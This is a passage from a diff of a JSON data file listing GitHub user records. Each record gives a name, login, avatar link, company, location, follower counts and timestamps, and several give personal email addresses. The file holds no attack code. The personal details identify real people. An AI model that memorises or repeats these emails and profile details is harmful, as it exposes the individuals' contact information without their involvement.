Hensrud Gulla", - "login": "tomahg", - "email": "tomas.h.gulla@novacare.no", - "avatar_url": "https://avatars.githubusercontent.com/u/1119118?v=4", - "company": "Novacare", - "location": "Norway", + "nest_created_at": "2024-09-22T08:44:17.888Z", + "nest_updated_at": "2024-09-22T19:29:00.581Z", + "name": "Edge Dalmacio", + "login": "edgedalmacio", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102205?v=4", + "company": "@Grab", + "location": "Singapore", "collaborators_count": 0, - "following_count": 16, - "followers_count": 11, + "following_count": 3, + "followers_count": 49, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2011-10-11T10:22:41Z", - "updated_at": "2024-09-10T11:11:40Z", - "node_id": "MDQ6VXNlcjExMTkxMTg=", + "public_repositories_count": 14, + "created_at": "2009-07-06T17:27:36Z", + "updated_at": "2024-09-04T20:50:20Z", + "node_id": "MDQ6VXNlcjEwMjIwNQ==", "bio": "", "is_hireable": false, - "twitter_username": "TomasGulla" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2087, + "pk": 7402, "fields": { - "nest_created_at": "2024-09-12T00:35:24.498Z", - "nest_updated_at": "2024-09-12T00:35:24.498Z", - "name": "", - "login": "jenspopp", + "nest_created_at": "2024-09-22T08:44:18.212Z", + "nest_updated_at": "2024-09-22T19:29:00.897Z", + "name": "Eric Winkler", + "login": "eric-winkler", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11076541?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2142978?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-02-19T15:22:06Z", - "updated_at": "2024-05-17T05:57:09Z", - "node_id": "MDQ6VXNlcjExMDc2NTQx", + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 22, + "created_at": "2012-08-13T07:38:44Z", + "updated_at": "2024-08-30T07:09:59Z", + "node_id": "MDQ6VXNlcjIxNDI5Nzg=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ericwinkler" } }, { "model": "github.user", - "pk": 2088, + "pk": 7403, "fields": { - "nest_created_at": "2024-09-12T00:35:25.703Z", - "nest_updated_at": "2024-09-12T02:07:48.413Z", - "name": "", - "login": "ninianxing", + "nest_created_at": "2024-09-22T08:44:18.535Z", + "nest_updated_at": "2024-09-22T19:29:01.214Z", + "name": "Erik Erikson", + "login": "erikerikson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103549973?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/571200?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-04-13T02:57:20Z", - "updated_at": "2023-09-23T12:45:07Z", - "node_id": "U_kgDOBiwMFQ", + "followers_count": 49, + "public_gists_count": 1, + "public_repositories_count": 28, + "created_at": "2011-01-18T18:34:21Z", + "updated_at": "2024-09-19T11:26:19Z", + "node_id": "MDQ6VXNlcjU3MTIwMA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412453,24 +671002,49 @@ }, { "model": "github.user", - "pk": 2089, + "pk": 7404, "fields": { - "nest_created_at": "2024-09-12T00:35:26.908Z", - "nest_updated_at": "2024-09-12T00:35:26.908Z", - "name": "", - "login": "Spawney", + "nest_created_at": "2024-09-22T08:44:19.172Z", + "nest_updated_at": "2024-09-22T19:29:01.847Z", + "name": "Eugen Mayer", + "login": "EugenMayer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44836744?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/136934?v=4", + "company": "@KontextWork", + "location": "Germany", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 190, + "public_gists_count": 52, + "public_repositories_count": 188, + "created_at": "2009-10-08T17:24:47Z", + "updated_at": "2024-08-24T14:08:52Z", + "node_id": "MDQ6VXNlcjEzNjkzNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7405, + "fields": { + "nest_created_at": "2024-09-22T08:44:19.488Z", + "nest_updated_at": "2024-09-22T19:35:04.783Z", + "name": "Felix Wiedemann", + "login": "nwse-fwn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/159462365?v=4", + "company": "New Work SE", + "location": "Hamburg", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-11-07T11:27:37Z", - "updated_at": "2024-06-18T14:56:01Z", - "node_id": "MDQ6VXNlcjQ0ODM2NzQ0", + "public_repositories_count": 0, + "created_at": "2024-02-08T15:38:51Z", + "updated_at": "2024-06-06T08:57:54Z", + "node_id": "U_kgDOCYEz3Q", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412478,24 +671052,49 @@ }, { "model": "github.user", - "pk": 2090, + "pk": 7406, "fields": { - "nest_created_at": "2024-09-12T00:35:28.138Z", - "nest_updated_at": "2024-09-12T00:35:28.138Z", - "name": "Mark Wardell @ Agfa", - "login": "mwardell-agfa", + "nest_created_at": "2024-09-22T08:44:19.810Z", + "nest_updated_at": "2024-09-22T19:29:02.489Z", + "name": "Felix Wiedemann", + "login": "Nilix007", + "email": "felix@kann.it", + "avatar_url": "https://avatars.githubusercontent.com/u/1176393?v=4", + "company": "New Work SE", + "location": "Hamburg", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2011-11-06T19:54:18Z", + "updated_at": "2024-06-05T06:55:55Z", + "node_id": "MDQ6VXNlcjExNzYzOTM=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7407, + "fields": { + "nest_created_at": "2024-09-22T08:44:20.130Z", + "nest_updated_at": "2024-09-22T19:29:02.809Z", + "name": "Ferdinand Niedermann", + "login": "nerdinand", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/159962771?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/113440?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-02-13T21:53:30Z", - "updated_at": "2024-07-18T15:50:59Z", - "node_id": "U_kgDOCYjWkw", + "following_count": 16, + "followers_count": 32, + "public_gists_count": 23, + "public_repositories_count": 99, + "created_at": "2009-08-09T12:08:58Z", + "updated_at": "2024-08-25T08:56:47Z", + "node_id": "MDQ6VXNlcjExMzQ0MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412503,74 +671102,74 @@ }, { "model": "github.user", - "pk": 2091, + "pk": 7408, "fields": { - "nest_created_at": "2024-09-12T00:35:28.529Z", - "nest_updated_at": "2024-09-12T00:35:38.296Z", - "name": "Nicolas Humblot", - "login": "nhumblot", + "nest_created_at": "2024-09-22T08:44:20.516Z", + "nest_updated_at": "2024-09-22T19:29:03.152Z", + "name": "Florencio Cano", + "login": "fcano", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15015617?v=4", - "company": "Siteflow", - "location": "Malakoff, France", + "avatar_url": "https://avatars.githubusercontent.com/u/1067339?v=4", + "company": "Red Hat", + "location": "Valencia (Spain)", "collaborators_count": 0, - "following_count": 14, - "followers_count": 8, - "public_gists_count": 2, - "public_repositories_count": 15, - "created_at": "2015-10-07T13:41:08Z", - "updated_at": "2024-09-09T08:42:40Z", - "node_id": "MDQ6VXNlcjE1MDE1NjE3", + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2011-09-21T08:38:27Z", + "updated_at": "2024-07-30T10:23:48Z", + "node_id": "MDQ6VXNlcjEwNjczMzk=", "bio": "", "is_hireable": false, - "twitter_username": "nicolashumblot" + "twitter_username": "florenciocano" } }, { "model": "github.user", - "pk": 2092, + "pk": 7409, "fields": { - "nest_created_at": "2024-09-12T00:35:29.790Z", - "nest_updated_at": "2024-09-12T00:35:29.790Z", - "name": "Pierre", - "login": "Erylis21", + "nest_created_at": "2024-09-22T08:44:20.836Z", + "nest_updated_at": "2024-09-22T19:29:03.464Z", + "name": "Francois Marot", + "login": "fmarot", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57070535?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/633019?v=4", "company": "", - "location": "Montpellier", + "location": "Marseille", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-10-27T16:47:39Z", - "updated_at": "2023-10-20T18:16:48Z", - "node_id": "MDQ6VXNlcjU3MDcwNTM1", + "following_count": 5, + "followers_count": 6, + "public_gists_count": 15, + "public_repositories_count": 67, + "created_at": "2011-02-23T00:10:57Z", + "updated_at": "2024-08-22T18:12:05Z", + "node_id": "MDQ6VXNlcjYzMzAxOQ==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2093, + "pk": 7410, "fields": { - "nest_created_at": "2024-09-12T00:35:31.431Z", - "nest_updated_at": "2024-09-12T00:35:31.431Z", - "name": "", - "login": "sathish94git", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/173897394?v=4", + "nest_created_at": "2024-09-22T08:44:21.152Z", + "nest_updated_at": "2024-09-22T19:29:03.776Z", + "name": "S. A. Kiyak", + "login": "ahi", + "email": "s.ahmet.kiyak@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/125972?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 8, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-06-26T09:50:40Z", - "updated_at": "2024-06-26T09:50:50Z", - "node_id": "U_kgDOCl12sg", + "public_repositories_count": 7, + "created_at": "2009-09-12T00:48:35Z", + "updated_at": "2024-08-13T00:23:12Z", + "node_id": "MDQ6VXNlcjEyNTk3Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412578,49 +671177,49 @@ }, { "model": "github.user", - "pk": 2094, + "pk": 7411, "fields": { - "nest_created_at": "2024-09-12T00:35:32.667Z", - "nest_updated_at": "2024-09-12T00:35:32.667Z", - "name": "", - "login": "hpriya19", + "nest_created_at": "2024-09-22T08:44:21.468Z", + "nest_updated_at": "2024-09-22T19:29:04.090Z", + "name": "Ale Feltes Quenhan", + "login": "alefq", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/91110572?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1305312?v=4", + "company": "Sodep S.A.", + "location": "Asunción, Paraguay", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-09-21T04:59:17Z", - "updated_at": "2024-07-01T08:16:20Z", - "node_id": "MDQ6VXNlcjkxMTEwNTcy", + "following_count": 22, + "followers_count": 53, + "public_gists_count": 2, + "public_repositories_count": 70, + "created_at": "2012-01-04T23:58:22Z", + "updated_at": "2024-09-05T20:24:25Z", + "node_id": "MDQ6VXNlcjEzMDUzMTI=", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "alefeltes" } }, { "model": "github.user", - "pk": 2095, + "pk": 7412, "fields": { - "nest_created_at": "2024-09-12T00:35:33.887Z", - "nest_updated_at": "2024-09-12T00:35:33.887Z", - "name": "Evelyn Jiang", - "login": "eve1ynjiang", + "nest_created_at": "2024-09-22T08:44:21.787Z", + "nest_updated_at": "2024-09-22T19:29:04.401Z", + "name": "", + "login": "spyhunter99", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/115804711?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1975321?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2022-10-14T14:32:37Z", - "updated_at": "2024-04-16T06:03:31Z", - "node_id": "U_kgDOBucKJw", + "following_count": 13, + "followers_count": 45, + "public_gists_count": 2, + "public_repositories_count": 46, + "created_at": "2012-07-14T14:41:46Z", + "updated_at": "2023-08-27T20:59:33Z", + "node_id": "MDQ6VXNlcjE5NzUzMjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412628,24 +671227,24 @@ }, { "model": "github.user", - "pk": 2096, + "pk": 7413, "fields": { - "nest_created_at": "2024-09-12T00:35:35.104Z", - "nest_updated_at": "2024-09-12T00:35:35.104Z", - "name": "Sebastian M", - "login": "DocMoebiuz", - "email": "sebastian@mobiflight.com", - "avatar_url": "https://avatars.githubusercontent.com/u/86157512?v=4", + "nest_created_at": "2024-09-22T08:44:22.731Z", + "nest_updated_at": "2024-09-22T19:29:05.354Z", + "name": "", + "login": "AndrewJCarr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11930142?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2021-06-19T13:52:17Z", - "updated_at": "2024-09-04T20:03:31Z", - "node_id": "MDQ6VXNlcjg2MTU3NTEy", + "public_repositories_count": 2, + "created_at": "2015-04-13T18:36:40Z", + "updated_at": "2017-10-24T01:20:27Z", + "node_id": "MDQ6VXNlcjExOTMwMTQy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412653,49 +671252,49 @@ }, { "model": "github.user", - "pk": 2097, + "pk": 7414, "fields": { - "nest_created_at": "2024-09-12T00:35:37.895Z", - "nest_updated_at": "2024-09-12T00:35:37.896Z", - "name": "Jesus Torres", - "login": "jmtt89", - "email": "jmtt89@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1221543?v=4", + "nest_created_at": "2024-09-22T08:44:23.371Z", + "nest_updated_at": "2024-09-22T19:29:05.995Z", + "name": "Andrey Arapov", + "login": "arno01", + "email": "andrey.arapov@nixaid.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3791945?v=4", "company": "", - "location": "Caracas,Venezuela", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 6, - "public_gists_count": 4, - "public_repositories_count": 99, - "created_at": "2011-11-26T06:36:51Z", - "updated_at": "2024-02-09T22:53:06Z", - "node_id": "MDQ6VXNlcjEyMjE1NDM=", - "bio": "", + "following_count": 69, + "followers_count": 48, + "public_gists_count": 39, + "public_repositories_count": 421, + "created_at": "2013-03-06T21:53:00Z", + "updated_at": "2023-11-20T15:51:32Z", + "node_id": "MDQ6VXNlcjM3OTE5NDU=", + "bio": "\"If you want to live a happy life, tie it to a goal, not to people or things.\" - Albert Einstein.", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2098, + "pk": 7415, "fields": { - "nest_created_at": "2024-09-12T00:35:39.524Z", - "nest_updated_at": "2024-09-12T00:35:39.524Z", - "name": "", - "login": "martijndebruijn", + "nest_created_at": "2024-09-22T08:44:23.686Z", + "nest_updated_at": "2024-09-22T19:29:06.311Z", + "name": "Anton Koscejev", + "login": "koscejev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5550144?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3671218?v=4", "company": "", - "location": "", + "location": "Czech Republic", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 7, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2013-09-26T14:03:53Z", - "updated_at": "2024-08-22T04:43:18Z", - "node_id": "MDQ6VXNlcjU1NTAxNDQ=", + "public_repositories_count": 14, + "created_at": "2013-02-22T16:16:18Z", + "updated_at": "2024-09-13T09:49:33Z", + "node_id": "MDQ6VXNlcjM2NzEyMTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412703,24 +671302,24 @@ }, { "model": "github.user", - "pk": 2099, + "pk": 7416, "fields": { - "nest_created_at": "2024-09-12T00:35:40.708Z", - "nest_updated_at": "2024-09-12T00:35:40.708Z", - "name": "", - "login": "ankurga", + "nest_created_at": "2024-09-22T08:44:24.002Z", + "nest_updated_at": "2024-09-22T19:29:06.641Z", + "name": "Arjen Korevaar", + "login": "ArjenKorevaar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/97887666?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26165922?v=4", + "company": "@Mephix-com ", + "location": "Netherlands", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-01-17T11:40:36Z", - "updated_at": "2024-06-07T07:31:55Z", - "node_id": "U_kgDOBdWlsg", + "public_repositories_count": 12, + "created_at": "2017-03-03T13:17:19Z", + "updated_at": "2024-08-26T14:03:36Z", + "node_id": "MDQ6VXNlcjI2MTY1OTIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412728,24 +671327,24 @@ }, { "model": "github.user", - "pk": 2100, + "pk": 7417, "fields": { - "nest_created_at": "2024-09-12T00:35:41.952Z", - "nest_updated_at": "2024-09-12T00:35:41.952Z", - "name": "", - "login": "duvanquind", + "nest_created_at": "2024-09-22T08:44:24.949Z", + "nest_updated_at": "2024-09-22T19:29:07.627Z", + "name": "Bastien Jansen", + "login": "bjansen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122573788?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/281528?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2023-01-12T22:06:05Z", - "updated_at": "2024-07-23T15:02:30Z", - "node_id": "U_kgDOB05T3A", + "followers_count": 35, + "public_gists_count": 2, + "public_repositories_count": 45, + "created_at": "2010-05-19T16:15:10Z", + "updated_at": "2024-08-26T09:08:48Z", + "node_id": "MDQ6VXNlcjI4MTUyOA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412753,74 +671352,74 @@ }, { "model": "github.user", - "pk": 2101, + "pk": 7418, "fields": { - "nest_created_at": "2024-09-12T00:35:43.142Z", - "nest_updated_at": "2024-09-18T19:03:52.119Z", - "name": "Juan Manuel Romera", - "login": "juanmanuelromeraferrio", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9562899?v=4", + "nest_created_at": "2024-09-22T08:44:25.589Z", + "nest_updated_at": "2024-09-22T19:29:08.291Z", + "name": "Björn Dahlgren", + "login": "Dahlgren", + "email": "bjorn@dahlgren.io", + "avatar_url": "https://avatars.githubusercontent.com/u/288631?v=4", "company": "", - "location": "", + "location": "Stockholm, Sweden", "collaborators_count": 0, - "following_count": 2, - "followers_count": 12, - "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2014-11-05T02:16:35Z", - "updated_at": "2024-08-16T11:56:24Z", - "node_id": "MDQ6VXNlcjk1NjI4OTk=", - "bio": "", + "following_count": 19, + "followers_count": 91, + "public_gists_count": 3, + "public_repositories_count": 226, + "created_at": "2010-05-27T12:53:20Z", + "updated_at": "2024-09-21T06:09:22Z", + "node_id": "MDQ6VXNlcjI4ODYzMQ==", + "bio": "I code stuff", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2102, + "pk": 7419, "fields": { - "nest_created_at": "2024-09-12T00:35:45.967Z", - "nest_updated_at": "2024-09-12T00:35:45.967Z", - "name": "Alix", - "login": "alixwar", - "email": "alix.warnke@assaabloy.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5415786?v=4", - "company": "ASSA ABLOY Group Technology Team", - "location": "Stockholm, Sweden", + "nest_created_at": "2024-09-22T08:44:26.227Z", + "nest_updated_at": "2024-09-22T19:29:08.917Z", + "name": "Brayden Streibel", + "login": "streibeb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5529942?v=4", + "company": "@devproca ", + "location": "Saskatchewan, Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2013-09-09T06:54:08Z", - "updated_at": "2024-07-10T06:41:45Z", - "node_id": "MDQ6VXNlcjU0MTU3ODY=", - "bio": "This is my work account.\r\n\r\nNon-work account: alwa", + "following_count": 2, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2013-09-24T18:10:03Z", + "updated_at": "2024-07-23T02:57:08Z", + "node_id": "MDQ6VXNlcjU1Mjk5NDI=", + "bio": "Partner & Principal Developer @devproca ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2103, + "pk": 7420, "fields": { - "nest_created_at": "2024-09-12T00:35:47.144Z", - "nest_updated_at": "2024-09-12T00:35:47.144Z", - "name": "Jesus", - "login": "crowster", - "email": "jese_koko@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/8674781?v=4", + "nest_created_at": "2024-09-22T08:44:26.577Z", + "nest_updated_at": "2024-09-22T19:29:09.267Z", + "name": "Chris Graham", + "login": "ChrisGWarp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2376797?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, + "following_count": 2, "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2014-09-06T02:35:20Z", - "updated_at": "2024-07-12T14:34:23Z", - "node_id": "MDQ6VXNlcjg2NzQ3ODE=", + "public_gists_count": 2, + "public_repositories_count": 5, + "created_at": "2012-09-19T08:26:37Z", + "updated_at": "2023-11-20T04:35:22Z", + "node_id": "MDQ6VXNlcjIzNzY3OTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412828,24 +671427,24 @@ }, { "model": "github.user", - "pk": 2104, + "pk": 7421, "fields": { - "nest_created_at": "2024-09-12T00:35:52.793Z", - "nest_updated_at": "2024-09-12T00:35:52.793Z", + "nest_created_at": "2024-09-22T08:44:27.912Z", + "nest_updated_at": "2024-09-22T19:29:10.623Z", "name": "", - "login": "lucky499", + "login": "CristianDuta", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45645005?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7222565?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-12-06T01:36:40Z", - "updated_at": "2024-08-26T15:33:08Z", - "node_id": "MDQ6VXNlcjQ1NjQ1MDA1", + "public_repositories_count": 14, + "created_at": "2014-04-08T08:30:42Z", + "updated_at": "2024-07-02T06:49:56Z", + "node_id": "MDQ6VXNlcjcyMjI1NjU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412853,24 +671452,24 @@ }, { "model": "github.user", - "pk": 2105, + "pk": 7422, "fields": { - "nest_created_at": "2024-09-12T00:35:53.979Z", - "nest_updated_at": "2024-09-12T00:35:57.635Z", - "name": "Edward", - "login": "edward9944", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19667392?v=4", + "nest_created_at": "2024-09-22T08:44:28.227Z", + "nest_updated_at": "2024-09-22T19:29:10.969Z", + "name": "Fritz Elfert", + "login": "felfert", + "email": "fritz-github@fritz-elfert.de", + "avatar_url": "https://avatars.githubusercontent.com/u/731252?v=4", "company": "", - "location": "", + "location": "Sittensen, Germany", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-05-31T12:38:25Z", - "updated_at": "2024-08-04T14:32:00Z", - "node_id": "MDQ6VXNlcjE5NjY3Mzky", + "followers_count": 59, + "public_gists_count": 1, + "public_repositories_count": 62, + "created_at": "2011-04-15T10:09:26Z", + "updated_at": "2024-07-27T07:53:03Z", + "node_id": "MDQ6VXNlcjczMTI1Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412878,24 +671477,49 @@ }, { "model": "github.user", - "pk": 2106, + "pk": 7423, "fields": { - "nest_created_at": "2024-09-12T00:35:55.976Z", - "nest_updated_at": "2024-09-12T00:35:55.976Z", + "nest_created_at": "2024-09-22T08:44:28.551Z", + "nest_updated_at": "2024-09-22T19:29:11.295Z", "name": "", - "login": "sadeesh89", + "login": "Jidehem", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/80089267?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/647939?v=4", "company": "", - "location": "", + "location": "Switzerland", "collaborators_count": 0, "following_count": 0, "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2011-03-02T22:44:44Z", + "updated_at": "2024-07-16T09:18:14Z", + "node_id": "MDQ6VXNlcjY0NzkzOQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7424, + "fields": { + "nest_created_at": "2024-09-22T08:44:30.187Z", + "nest_updated_at": "2024-09-22T19:29:12.862Z", + "name": "Jordan Stewart", + "login": "dmgd", + "email": "jordan.r.stewart@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/183554?v=4", + "company": "", + "location": "London", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-03-05T06:19:22Z", - "updated_at": "2024-08-06T09:09:18Z", - "node_id": "MDQ6VXNlcjgwMDg5MjY3", + "public_repositories_count": 14, + "created_at": "2010-01-16T14:06:09Z", + "updated_at": "2024-07-21T20:16:15Z", + "node_id": "MDQ6VXNlcjE4MzU1NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412903,24 +671527,24 @@ }, { "model": "github.user", - "pk": 2107, + "pk": 7425, "fields": { - "nest_created_at": "2024-09-12T00:35:59.650Z", - "nest_updated_at": "2024-09-12T00:35:59.650Z", - "name": "Tanmoy", - "login": "tanmoyrsc", + "nest_created_at": "2024-09-22T08:44:30.511Z", + "nest_updated_at": "2024-09-22T19:29:13.172Z", + "name": "", + "login": "JordanKergoat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35572190?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3851530?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-01-18T16:16:46Z", - "updated_at": "2024-08-23T04:35:25Z", - "node_id": "MDQ6VXNlcjM1NTcyMTkw", + "public_repositories_count": 9, + "created_at": "2013-03-13T08:12:54Z", + "updated_at": "2024-03-13T06:30:46Z", + "node_id": "MDQ6VXNlcjM4NTE1MzA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412928,24 +671552,49 @@ }, { "model": "github.user", - "pk": 2108, + "pk": 7426, "fields": { - "nest_created_at": "2024-09-12T00:36:00.899Z", - "nest_updated_at": "2024-09-12T00:36:00.899Z", - "name": "", - "login": "manoelacmn", + "nest_created_at": "2024-09-22T08:44:30.844Z", + "nest_updated_at": "2024-09-22T19:29:13.481Z", + "name": "Josh Brown", + "login": "ropwareJB", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104083139?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1904543?v=4", + "company": "ROPWARE", + "location": "Seattle", + "collaborators_count": 0, + "following_count": 154, + "followers_count": 39, + "public_gists_count": 3, + "public_repositories_count": 72, + "created_at": "2012-06-29T02:14:52Z", + "updated_at": "2024-09-17T01:45:06Z", + "node_id": "MDQ6VXNlcjE5MDQ1NDM=", + "bio": "did you vaccuum the database?!", + "is_hireable": false, + "twitter_username": "ropwareJB" + } +}, +{ + "model": "github.user", + "pk": 7427, + "fields": { + "nest_created_at": "2024-09-22T08:44:31.157Z", + "nest_updated_at": "2024-09-22T19:29:13.809Z", + "name": "Joshua Hyde", + "login": "jrh3k5", + "email": "jrh3k5@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/545587?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 29, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 28, - "created_at": "2022-04-20T14:18:45Z", - "updated_at": "2024-08-27T13:24:07Z", - "node_id": "U_kgDOBjQuww", + "following_count": 1, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 41, + "created_at": "2011-01-03T15:47:45Z", + "updated_at": "2024-08-05T21:26:11Z", + "node_id": "MDQ6VXNlcjU0NTU4Nw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412953,24 +671602,24 @@ }, { "model": "github.user", - "pk": 2109, + "pk": 7428, "fields": { - "nest_created_at": "2024-09-12T00:36:02.101Z", - "nest_updated_at": "2024-09-12T00:36:02.101Z", - "name": "Amit Chaurasiya", - "login": "ChaurAW1", + "nest_created_at": "2024-09-22T08:44:32.150Z", + "nest_updated_at": "2024-09-22T19:29:14.753Z", + "name": "Justin Tay", + "login": "justin-tay", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/158049732?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/49700559?v=4", "company": "", - "location": "", + "location": "Singapore", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2024-01-29T12:03:48Z", - "updated_at": "2024-08-16T09:59:53Z", - "node_id": "U_kgDOCWulxA", + "public_repositories_count": 39, + "created_at": "2019-04-16T23:59:34Z", + "updated_at": "2024-07-25T01:18:57Z", + "node_id": "MDQ6VXNlcjQ5NzAwNTU5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412978,24 +671627,24 @@ }, { "model": "github.user", - "pk": 2110, + "pk": 7429, "fields": { - "nest_created_at": "2024-09-12T00:36:03.285Z", - "nest_updated_at": "2024-09-12T00:36:03.285Z", + "nest_created_at": "2024-09-22T08:44:32.473Z", + "nest_updated_at": 